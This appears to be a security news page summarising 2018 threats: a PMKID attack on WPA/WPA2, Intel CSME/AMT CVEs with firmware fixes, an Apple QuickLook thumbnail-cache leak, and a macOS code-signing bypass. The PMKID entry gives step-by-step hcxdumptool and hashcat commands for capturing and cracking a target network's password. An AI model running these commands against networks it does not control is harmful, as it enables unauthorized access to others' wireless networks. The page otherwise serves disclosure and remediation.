Cyber Threat News

 

 

August


PMKID WPA/WPA2 Exploit

Routers with roaming enabled do not require the 4-way handshake to capture pcap

August 8 | Analysis: 3

PMKID Hack WPA/WPA2

1 — An attacker can use tools likehcxdumptool(v4.2.0 or higher), and others to request the PMKID from the targeted access point and dump the received frame.

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status

Step 2 — Using thehcxpcaptool tool , the output (in pcapng format) of the frame can then be converted into a hash format accepted by Hashcat.

$ ./hcxpcaptool -z test.16800 test.pcapng

Step 3 — UseHashcat(v4.2.0 or higher) password cracking tool to obtain the WPA PSK (Pre-Shared Key) password, and Bingo!

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

That’s the password of the target wireless network, cracking which may take time depending on its length and complexity

July


Intel Management Engine

Buffer Overflow & Memory Corruption

July 20 | Analysis: 4

Any overflow bug is a major issue, quick remediation recommended. Intel used two separate posts to identify the four major exploitable bugs. This can allow arbitrary code to be run

Affected products:

The issues affect Intel® Active Management Technology 3.x/4.x/5.x/6.x/7.x/8.x/9.x/10.x/11.x used in corporate PCs (Intel® vProTM, Intel® AMT), IOT devices, workstations and servers.  These firmware versions may be found on certain products:

•       Intel® Core™ 2 Duo vPro™ and Intel® Centrino™ 2 vPro™

•       1st, 2nd, 3rd, 4th, 5th, 6th, 7th, & 8th Generation Intel® Core™ Processor Family

•       Intel® Xeon® Processor E3-1200 v5 & v6 Product Family (Greenlow)

•       Intel® Xeon® Processor Scalable Family (Purley)

•       Intel® Xeon® Processor W Family (Basin Falls)

CVE ID CVE Title CVSSv3 severity CVSSv3 Vectors
CVE-2018-3628 Buffer overflow in HTTP handler in Intel®  Active Management   Technology in Intel Converged Security Manageability Engine Firmware 3.x,4.x,5.x,6.x,7.x,8.x,9.x, 10.x,11.x may allow an attacker to execute arbitrary code via the same subnet 8.1 (High) CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE-2018-3629 Buffer overflow in event handler in Intel®  Active Management   Technology in Intel Converged Security Manageability Engine Firmware 3.x,4.x,5.x,6.x,7.x,8.x,9.x, 10.x,11.x  may allow an attacker to cause a denial of service via the same subnet 7.5 (High) CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CVE-2018-3632 Memory corruption in Intel® Active Management Technology in Intel Converged Security Manageability Engine Firmware 6.x/7.x/8.x/9.x/10.x/11.0/11.5/11.6/11.7/11.10/11.20 could be triggered by an attacker with local administrator permission on system 6.4 (Medium) CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H

Recommendations:

Intel recommends that end users check with their system manufacturers and apply any available updates as soon as practical, based on the versions listed below, or higher:

 

Associated CPU Generation Resolved Firmware versions or higher
4th Generation Intel® Core™ Processor Family Intel® CSME 9.1.43

Intel® CSME 9.5.63

5th Generation Intel® Core™ Processor Family Intel® CSME 10.0.57
6th Generation Intel® Core™ Processor Family Intel® CSME 11.8.50
7th Generation Intel® Core™ Processor Family Intel® CSME 11.8.50
8th Generation Intel® Core™ Processor Family Intel® CSME 11.8.50
Intel® Xeon® Processor E3-1200 v5 & v6 Product Family Intel® CSME 11.8.50
Intel® Xeon® Processor Scalable Family Intel® CSME 11.21.51
Intel® Xeon® Processor W Family Intel® CSME 11.11.50

– The Intel® CSME firmware for the following products is no longer supported.  These products will not receive a firmware update: Intel® Core™ 2 Duo vPro™, Intel® Centrino™ 2 vPro™, 1st Generation Intel® Core™, 2nd Generation Intel® Core™, 3rd Generation Intel® Core™.

Acknowledgements:

CVE-2018-3628, CVE-2018-3629 and CVE-2018-3632 were discovered by Intel as part of continuously improving the robustness of the Intel® Converged Security Management Engine (Intel® CSME).

Source: https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00112.html

And then in another post from intel related to the issue, possibly found during the writing of the above CVEs:

Affected products:

The issues affects Intel® CSME 11.x used in consumer/corporate PCs, IOT devices, and workstations.  The affected firmware version may be found on these products:

•       6th, 7th, & 8th Generation Intel® Core™ Processor Family

•       Intel® Xeon® Processor E3-1200 v5 & v6 Product Family (Greenlow)

•       Intel® Xeon® Processor W Family (Basin Falls)

CVE ID CVE Title CVSSv3 severity CVSSv3 Vectors
CVE-2018-3627 Logic bug in  Intel® Converged Security Management Engine 11.x may allow an attacker to execute arbitrary code via local privileged access 7.5 (High) CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

Recommendations:

Intel recommends that end users check with their system manufacturers and apply any available updates as soon as practical, based on the versions listed below, or higher:

 

Associated CPU Generation Resolved Firmware versions or higher
6th Generation Intel® Core™ Processor Family Intel® CSME 11.8.50
7th Generation Intel® Core™ Processor Family Intel® CSME 11.8.50
8th Generation Intel® Core™ Processor Family Intel® CSME 11.8.50
Intel® Xeon® Processor E3-1200 v5 & v6 Product Family Intel® CSME 11.8.50
Intel® Xeon® Processor W Family Intel® CSME 11.11.50

Acknowledgements:

CVE-2018-3627 was discovered by Intel as part of continuously improving the robustness of the Intel® Converged Security Management Engine (Intel® CSME).

Source: https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00118.html

JUNE


Apple QuickLook Encryption

June 2018Analysis: 1-2

TLDR:

Images (such as screenshots taken of sensitive data) are the latest security flaws uncovered for Apple. Researchers discovered that encrypted drives did not encrypt a key folder macOS uses for previewing your files.

Attack Vectors:

I found out that Quicklook registers com.apple.quicklook.ThumbnailsAgent XPC service that is responsible for creating thumbnails database and storing it in /var/folders/…/C/com.apple.QuickLook.thumbnailcache/ directory. It means that all photos that you have previewed using space (or Quicklook cached them independently) are stored in that directory as a miniature and its path. They stay there even if you delete these files or if you have previewed them in encrypted HDD or TrueCrypt/VeraCrypt container.

Remediation:

Deleting the cache folder of thumbnails is advised by executing the following commands in Terminal:

rm -rf $TMPDIR/../C/com.apple.QuickLook.thumbnailcache

sudo reboot

Alternatively, this can be done without rebooting using:

qlmanage -r cache


Apple Code Signing Verification

June 2018 | Threat Analysis: 3

Background:

Exploitable since 2005, this recent discovery is an epic Apple security failure. macOS & OSX require code to be digitally signed in order to run; faking this signature is very simple and straightforward.

Attack Vector:

By setting the CPU_Type to an invalid type or valid not native CPU type (example: PPC), the Mach-O loader will skip over the validly signed Mach-O binary and execute the malicious (non-Apple signed) code…

Proof of concept

Affected Vendors:

  • VirusTotal (CVE-2018-10408)
  • Google – Santa, molcodesignchecker (CVE-2018-10405)
  • Facebook – OSQuery (CVE-2018-6336)
  • Objective Development – LittleSnitch (CVE-2018-10470)
  • F-Secure – xFence, also LittleFocker (CVE-2018-10403)
  • Objective-See – WhatsYourSign, ProcInfo, KnockKnock, LuLu, TaskExplorer & others (CVE-2018-10404)
  • Yelp – OSXCollector (CVE-2018-10406)
  • Carbon Black – Cb Response (CVE-2018-10407)

Remediation:

  • Mac users are advised to update and apply all necessary fixes to prevent malicious software manipulating the signing process.
  • Native security tools built into macOS are not exposed. The above list of vendors was contacted and patches can be found at their respective websites or through updating the software.
  • Developers are required to follow the guidelines of the code signing API and testing POC’s are also available.

 

Threat analysis measured 1-5

Root Down Digital